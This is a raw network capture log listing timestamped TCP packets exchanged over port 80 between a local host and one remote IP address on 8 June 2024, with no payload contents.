Jun 8, 2024 20:22:05.971560001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.971575022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.971590042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.971605062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.971605062 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.971621990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.971637964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.971637964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.971638918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.971658945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.971658945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.971683979 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.971704006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.972451925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.972469091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.972497940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.972513914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.972522974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.972522974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.972529888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.972546101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.972547054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.972564936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.972570896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.972570896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.972580910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.972589970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.972609043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.972628117 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.973370075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.973387003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.973402023 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.973418951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.973428011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.973437071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.973448038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.973454952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.973468065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.973474026 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.973490953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.973499060 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.973499060 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.973506927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.973519087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.973536968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.973556042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.974268913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.974286079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.974302053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.974318027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.974322081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.974334002 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.974345922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.974351883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.974369049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.974369049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.974392891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.974410057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.975186110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.975203037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.975218058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.975234985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.975250006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.975251913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.975250006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.975270987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.975272894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.975289106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.975300074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.975300074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.975300074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.975306988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.975330114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.975366116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.976121902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.976139069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.976155043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.976171970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.976178885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.976187944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.976201057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.976206064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.976201057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.976223946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.976232052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.976232052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.976241112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.976252079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.976272106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.976290941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.977014065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977030993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977046967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977062941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977078915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977072954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.977096081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.977097034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977113962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977114916 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.977130890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977140903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.977140903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.977165937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.977165937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.977845907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977863073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977879047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977896929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.977906942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.977943897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.977945089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.978297949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.978313923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.978329897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.978344917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.978360891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.978362083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.978362083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.978378057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.978384018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.978384018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.978395939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.978415966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.978415966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.978435040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.981550932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981580019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981607914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981631994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.981631994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.981637001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981657982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.981667042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981707096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.981708050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.981709957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981739998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981765032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.981767893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981787920 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.981822014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.981884003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981911898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981935978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.981940985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981956959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.981972933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.981993914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982003927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982014894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982033968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982054949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982075930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982079983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982110023 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982136965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982137918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982156038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982167006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982191086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982198954 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982225895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982228041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982244968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982254982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982276917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982284069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982312918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982319117 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982336998 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982345104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982366085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982378006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982388973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982422113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982424021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982450962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982470989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982481003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982508898 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982526064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982568026 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982598066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982620001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982626915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982640982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982656002 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982673883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982683897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982702971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982712984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.982750893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.982774973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.983444929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.983473063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.983500957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.983511925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.983511925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.983530045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.983544111 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.983577967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.983598948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.983628035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.983649015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.983656883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.983670950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.983688116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.983705044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.983715057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.983735085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.983757019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.984460115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.984507084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.984514952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.984534979 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.984558105 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.984563112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.984580040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.984591007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.984608889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.984637022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.984642982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.984666109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.984687090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.984694958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.984710932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.984721899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.984739065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.984750986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.984767914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.984797001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.985300064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.985328913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.985358953 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.985390902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.985527992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.985557079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.985585928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.985585928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.985606909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.985615015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.985629082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.985646009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.985665083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.985676050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.985688925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.985704899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.985722065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.985757113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986008883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.986052990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.986082077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.986083984 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986107111 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986114025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.986128092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986159086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.986161947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986187935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.986216068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.986207008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986244917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.986247063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986267090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986274958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.986289024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986304998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.986319065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986331940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.986355066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986383915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.986984015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987011909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987040997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987050056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.987050056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.987071991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987085104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.987102032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987119913 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.987132072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987145901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.987160921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987184048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.987189054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987205029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.987219095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987241983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.987246990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987266064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.987277031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987294912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.987307072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:05.987323999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:05.987373114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.083940029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084014893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084018946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084053993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084070921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084095001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084112883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084131956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084136009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084163904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084182024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084216118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084295034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084330082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084355116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084367037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084377050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084419012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084640980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084676981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084706068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084732056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084798098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084835052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.084856987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.084880114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.085141897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.085177898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.085200071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.085226059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.085300922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.085335016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.085360050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.085371017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.085397005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.085407019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.085416079 CEST	49731	80	192.168.2.4	23.88.106.134
